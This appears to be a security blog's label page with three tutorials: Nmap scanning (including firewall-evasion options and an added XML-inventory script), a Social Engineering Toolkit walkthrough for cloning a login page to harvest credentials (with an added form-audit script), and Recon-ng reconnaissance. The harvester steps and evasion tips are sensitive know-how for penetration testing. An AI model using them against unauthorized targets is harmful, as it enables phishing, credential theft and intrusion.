Showing posts with label Open Source Intelligence. Show all posts

Wednesday, June 7, 2017

OSINT: Nmap


Disclaimer
Do NOT perform network scans against networks without prior authorization.

Download
Nmap for Windows
Nmap for Linux

Background
This blog post is designed to give the reader a basic understanding of how Nmap works and of the concepts to consider when performing a network scan.

Purpose
Network scanning is the probing of individual network systems to obtain information about them. Packets are sent with various TCP flags set (SYN, ACK, FIN, URG, PSH) in order to solicit a response from the target system. Each kind of response (a SYN/ACK, a RST, an ICMP unreachable message, or no reply at all) is a known signal about the state of the probed port, which is how Nmap decides whether it is open, closed, or filtered.

Requirements
To perform a network scan, the scanning system needs one of the following for the target: an IP address, an IP address range in CIDR notation, or a domain name.

Methodology
Network scanning is a balancing act between how thoroughly you probe a system and how much time and bandwidth the probing costs. Hammering an individual system with many probes in flight at once, or running OS and version detection against fragile embedded devices, increases the likelihood of the target misbehaving or crashing. Bandwidth consumption is the other constant concern: consuming too much will slow the network down for business operations. Limit what a scan costs by setting a per-host time limit (--host-timeout), capping the packet rate (--max-rate), and restricting the ports, protocols and detection options to what you actually need. Scanning multiple hosts in parallel (--min-hostgroup, --min-parallelism) will speed the scan up, at the price of a higher instantaneous load on the network.

Output
The output from Nmap is a list of scanned targets, with supplemental information on each depending on the options used. Key among that information is the “interesting ports table”. That table lists the port number and protocol, service name, and state. The state is either open, filtered, closed, or unfiltered. Open means that an application on the target machine is listening for connections/packets on that port. Filtered means that a firewall, filter, or other network obstacle is blocking the port so that Nmap cannot tell whether it is open or closed. Closed ports have no application listening on them, though they could open up at any time. Ports are classified as unfiltered when they are responsive to Nmap's probes, but Nmap cannot determine whether they are open or closed. Nmap reports the state combinations open|filtered and closed|filtered when it cannot determine which of the two states describe a port. The port table may also include software version details when version detection has been requested. [2]

How To
Syntax:
nmap [option] [option]... target (domain name, IP address, or CIDR range)

List of Nmap Options

Common Issues
Firewalls and host systems can be configured to drop, or simply not respond to, probes carrying particular flag combinations, based on criteria such as source address, rate, or destination port. A silently dropped probe looks exactly like a filtered port, so the absence of a reply is not proof that nothing is listening. [1]

Common Solutions
Evade Firewalls:
  • Don't ping: use -Pn (-P0 in older versions) to suppress the ICMP and TCP ping probes that a firewall is most likely to block.
  • Skip the default discovery check: with -Pn every target address is treated as up and port-scanned directly, so hosts that silently drop discovery probes are not missed. The cost is time spent scanning addresses that really are down.
  • Limit the number of SYN packets you send at one time: cap the rate (--max-rate), add a delay between probes (--scan-delay), or pick a slower timing template (-T2 or -T3) so rate-based blocking and IDS thresholds are less likely to trip. [1]

Use Cases
Nmap is used mainly for two purposes: asset management and vulnerability scanning.

Vulnerability Scanning
One use of network scanning is identifying vulnerabilities in individual network systems. This is done through a process called fingerprinting, in which as much identifying information about a system as possible is collected: OS detection (-O) and service/version detection (-sV) are the Nmap options that produce it. It is a best practice to turn on verbose output (-v) when fingerprinting so that the log shows what Nmap tried and why it gave up, for troubleshooting purposes. Key information from fingerprinting includes (but is not limited to):
  • Services running
  • Operating systems
  • Device type
  • OS CPE
  • OS details
  • Uptime guess
  • Network Distance
  • TCP Sequence Prediction
  • IP ID sequence generation
Asset Management
Asset management is the process of maintaining current information on the system inventory. In addition to the physical inventory, the capabilities and usage of each system can also be cataloged. The process is similar to vulnerability scanning, with a change in focus for the resulting information: one may be more interested in an individual system's uptime or the services it runs, for the purpose of identifying that system's role in the organization's infrastructure.

For an asset management scan I would scan the network in segments and, if possible, outside business hours. To segment the network, first determine which systems are internet-facing and which are internal and treat the two groups separately. For the public-facing segment, start with a host discovery scan (-sn) to learn which systems are online before probing them further. For speed on ranges you already know are populated, skip host discovery (-Pn) so Nmap does not wait for a reply from each address before port scanning it. To speed the scan up further, increase the number of hosts scanned in parallel with one another (--min-hostgroup, --min-parallelism). Writing the results to XML (-oX) makes them easy to load into an inventory afterwards.
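The following script is an added example, not code from the original post or from the Nmap project. It turns the XML that nmap -oX writes into the kind of inventory record the post describes: the port table with its open/filtered/closed states from the Output section, the OS, uptime and network-distance fields from the fingerprinting list, and a role guess per host. SAMPLE_XML is a hand-constructed document (three hosts, one of them down) so the script runs offline; the ROLE_HINTS table is an assumption made for this example, not an Nmap feature.

```python
"""Turn Nmap XML output (-oX) into an asset inventory.

Added example, not code from the original post or the Nmap project. It reads
the XML that `nmap -sV -O -oX scan.xml <targets>` writes and keeps the fields
the post lists under fingerprinting and asset management. SAMPLE_XML is a
hand-constructed document so the script runs offline.
"""
import xml.etree.ElementTree as ET

# Constructed sample: two live hosts and one that never answered.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -O -oX scan.xml 192.0.2.8/29">
  <host>
    <status state="up" reason="syn-ack"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <hostnames><hostname name="web01.example.test" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="7.4"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open" reason="syn-ack"/>
        <service name="http" product="Apache httpd" version="2.4.6"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="filtered" reason="no-response"/>
        <service name="microsoft-ds"/>
      </port>
    </ports>
    <os><osmatch name="Linux 3.10 - 4.11" accuracy="96"/></os>
    <uptime seconds="864000" lastboot="Sun May 28 10:00:00 2017"/>
    <distance value="2"/>
  </host>
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="192.0.2.11" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="3389">
      <state state="open" reason="syn-ack"/><service name="ms-wbt-server"/>
    </port></ports>
  </host>
  <host><status state="down" reason="no-response"/>
    <address addr="192.0.2.12" addrtype="ipv4"/></host>
</nmaprun>
"""

# Service-to-role hints: an assumption made for this example, not an Nmap feature.
ROLE_HINTS = {"ssh": "unix-admin", "http": "web", "https": "web", "mysql": "database",
              "ms-wbt-server": "windows-rdp", "microsoft-ds": "windows-smb"}


def parse_inventory(xml_text):
    """One record per host that was up, carrying the fields the post lists."""
    inventory = []
    for host in ET.fromstring(xml_text).findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # a down host has no ports or OS data to record
        addr = host.find("address[@addrtype='ipv4']")
        name = host.find("hostnames/hostname")
        rec = {"address": addr.get("addr") if addr is not None else None,
               "hostname": name.get("name") if name is not None else None,
               "ports": [], "os": None, "os_accuracy": None,
               "uptime_days": None, "distance": None}
        for port in host.findall("ports/port"):
            svc = port.find("service")
            attrs = (svc.get("product"), svc.get("version")) if svc is not None else ()
            rec["ports"].append({"port": int(port.get("portid")),
                                 "proto": port.get("protocol"),
                                 "state": port.find("state").get("state"),
                                 "service": svc.get("name") if svc is not None else None,
                                 "product": " ".join(v for v in attrs if v)})
        best = host.find("os/osmatch")  # Nmap lists its best OS match first
        if best is not None:
            rec["os"], rec["os_accuracy"] = best.get("name"), int(best.get("accuracy"))
        uptime = host.find("uptime")
        if uptime is not None:
            rec["uptime_days"] = round(int(uptime.get("seconds")) / 86400, 1)
        dist = host.find("distance")
        if dist is not None:
            rec["distance"] = int(dist.get("value"))
        inventory.append(rec)
    return inventory


def guess_roles(rec):
    """Role tags from OPEN services only: a filtered port is unknown, not evidence."""
    return sorted({ROLE_HINTS[p["service"]] for p in rec["ports"]
                   if p["state"] == "open" and p["service"] in ROLE_HINTS})


def filtered_ports(rec):
    """Ports Nmap could not resolve (filtered, open|filtered, closed|filtered)."""
    return [p["port"] for p in rec["ports"] if "filtered" in p["state"]]


if __name__ == "__main__":
    for rec in parse_inventory(SAMPLE_XML):
        print(rec["address"], rec["hostname"], rec["os"], guess_roles(rec),
              "unresolved:", filtered_ports(rec))
```

Two design points worth noting. Only open ports contribute to the role guess, because a filtered port tells you that something between you and the host dropped the probe, not that a service exists; filtered_ports() lists those separately so they can be rescanned from a different vantage point or with -Pn. And the hostname, OS, uptime and distance elements are all optional in real output (they only appear when the corresponding detection was requested and succeeded), so each is read defensively rather than assumed.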

Nmap Scripting Engine (NSE)
(Disclaimer: I do not recommend running a publicly available NSE script without first reviewing its code yourself to determine that it is legitimate and does what it claims; an NSE script runs with the same privileges as Nmap, which is usually root.)
Here is Nmap.org's official list of NSE scripts, contributed by security professionals and amateurs alike. I recommend reviewing their code to learn how to write your own NSE scripts.

Resources
List of websites available for scanning

Nmap 6 Cookbook: The Fat Free Guide to Network Scanning by Nicholas Marsh
  • ISBN-10: 1507781385
  • ISBN-13: 978-1507781388
Hands on Tutorials

References
1. Nmap 6 Cookbook: The Fat Free Guide to Network Scanning by Nicholas Marsh
  • ISBN-10: 1507781385
  • ISBN-13: 978-1507781388
2. Chapter 15. Nmap Reference Guide
  • https://nmap.org/book/man.html
3. Nmap Options
Social Media
Facebook:
https://www.facebook.com/BDavisCS/

Twitter:
@BDavis_CyberSec

Friday, March 10, 2017

Social Engineering Toolkit: Credential Harvesting


Overview
The Social Engineering Toolkit (SET) is specifically designed to perform advanced attacks against the human element.[1]


Requirements
For this blog post I used the Kali Linux operating system which comes with SET pre-installed.



Instructions
Launch SET
  • Applications > Exploitation Tools > Social Engineering ToolKit
A. Loading Credential Harvesting
  1. Select: "1) Social-Engineering Attacks" by typing the number 1
  2. Select: "2) Website Attack Vectors" by typing the number 2
  3. Select: "3) Credential Harvester Attack Method" by typing the number 3
  4. Select: "3) Custom Import"  by typing the number 3


B. Cloning A Website
  1. Open a browser (Any browser will work)
  2. Navigate to the Website Login page you wish to clone. 
  3. Open the File menu in your browser and choose the option to save the page.
  4. Change the Name field to index.html (the name is case sensitive)
  5. Change the Save Location to /var/www/html
  6. Change Type to Web Page, Complete
  7. Save
C. Arming the Website
  1. Open a Terminal and type ifconfig (on newer Kali releases, ip addr)
  2. Copy the inet addr: xxx.xxx.xxx.xxx of the interface the victim will reach you on
  3. Paste the inet addr into the terminal running SET
    • set: webattack > IP address for the POST back in Harvester/Tabnabbing: xxx.xxx.xxx.xxx
  4. Type the following file path:
    • /var/www/html
  5. Type the URL of the website you cloned.
  6. Type "y" for yes you want to start Apache server. 
D. Testing the Website
If everything was done correctly you'll see an exact clone of the website you cloned. 
  1. Open a browser (on the same machine you used SET on)
  2. Type in your inet addr: xxx.xxx.xxx.xxx into the URL bar.
  3. Hit Enter key
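A credential harvester only captures anything if the cloned page's login form submits to the harvester host instead of the real site, which is what the "IP address for the POST back" prompt in step C sets up. The script below is an added example, not code from SET or the original post: it reports, for every form on a saved page that contains a password field, whether its action resolves to the real site, to the harvester address, or to a third party. SAMPLE_HTML and the addresses in it are constructed for this example.

```python
"""Audit where the forms on a saved login page will submit credentials.

Added example, not code from SET or the original post. For every form that
contains a password field it resolves the form's action and reports whether
credentials would go to the real site, to the harvester IP, or elsewhere.
SAMPLE_HTML and the addresses are constructed for this example.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed clone of a login page saved from https://login.example.test/.
# The first login form is untouched; the second has been pointed at the harvester.
SAMPLE_HTML = """<html><body>
<form id="search" action="/search" method="get"><input name="q" type="text"></form>
<form id="login" action="/session" method="post">
  <input name="user" type="text"><input name="pass" type="password">
  <input type="submit" value="Sign in">
</form>
<form id="armed" action="http://192.0.2.5/" method="POST">
  <input name="user"><input name="pass" type="password">
</form>
</body></html>"""


class FormCollector(HTMLParser):
    """Collect each <form> with its action, method and input fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # attribute names arrive lower-cased
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "method": (a.get("method") or "get").lower(),
                             "fields": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["fields"].append((a.get("name"), (a.get("type") or "text").lower()))

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_forms(html, page_url, harvester_ip):
    """Classify every credential form by the host its action resolves to."""
    parser = FormCollector()
    parser.feed(html)
    real_host = urlsplit(page_url).hostname
    report = []
    for form in parser.forms:
        if not any(ftype == "password" for _, ftype in form["fields"]):
            continue  # no password field: not a credential form
        target = urljoin(page_url, form["action"])  # relative actions resolve against the page
        host = urlsplit(target).hostname
        if host == harvester_ip:
            verdict = "harvester"
        elif host == real_host:
            verdict = "real-site"
        else:
            verdict = "third-party"
        report.append({"action": target, "method": form["method"], "submits_to": verdict,
                       "fields": [name for name, _ in form["fields"] if name]})
    return report


if __name__ == "__main__":
    for row in audit_forms(SAMPLE_HTML, "https://login.example.test/", "192.0.2.5"):
        print(row["method"].upper(), row["action"], "->", row["submits_to"], row["fields"])
```

Note what page_url does: a form with a relative action (or no action at all) submits back to whatever URL the page is being served from, so the same untouched login form counts as "real-site" when audited against the original URL and as "harvester" when the clone is served from the harvester's address. The identical check, run from the defender's side on a suspicious page, is a simple phishing indicator: a login form whose action resolves to a host other than the page's own origin.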

Reference
1. Social Engineering Toolkit


OSINT Tool: Recon-ng


How to Use Open Source Intelligence Tool RECON-NG

Overview
"Recon-ng is a full-featured Web Reconnaissance framework written in Python. Complete with independent modules, database interaction, built in convenience functions, interactive help, and command completion, Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly." [1]

Recon-ng is a tool for performing open source intelligence gathering on domains and IP addresses. It can enumerate subdomains, resolve them to their associated IP addresses, geolocate those addresses, and more, using only publicly available data sources.


Download
Recon-ng


Syntax
[recon-ng][default] command



Help
To access the help menu type the following command:

  • help
  • example: 
    • [recon-ng][default] help 

Database
Everything this framework does populates a database belonging to the workspace you create; each workspace has its own SQLite database holding tables such as domains and hosts, which the modules read from and write to. Querying, creating, and deleting these records uses SQL-style syntax.

1. Creating a Workspace
  • A workspace is a separate database. To create one type the following command:
    • workspaces add
    • example: workspaces add WorkspaceName
  • Once you create your workspace you'll see the following prompt:
    • [recon-ng][WorkspaceName]
    • This means your workspace is selected and ready for use with any of the modules.
2. Defining Domains
  • After you create a workspace you have to define a domain for the modules to take action on.
  • To add a domain type the following:
    • add domain
    • [recon-ng][WorkspaceName] add domain DomainName
3. Deleting a Workspace
  • To delete a workspace and its database type the following command:
    • workspaces delete
    • example: [recon-ng][default] workspaces delete WorkspaceName
Modules
To find and load modules follow these steps:
1. Select your workspace
  • [recon-ng][default] workspaces select WorkspaceName
2. Search for Modules
  • Search Syntax:
    • [recon-ng][WorkspaceName] load SearchTerm
      • If the term matches more than one module, recon-ng lists every match instead of loading one.
      • Key search terms: domain, location, reports
3. Loading a Module
  • From the list of matches you are presented with, copy and paste the whole line containing the module's path and name.
    • example: [recon-ng][WorkspaceName] load Path/ModuleName

Recommended Videos

Reference(s)
1. Tools Kali
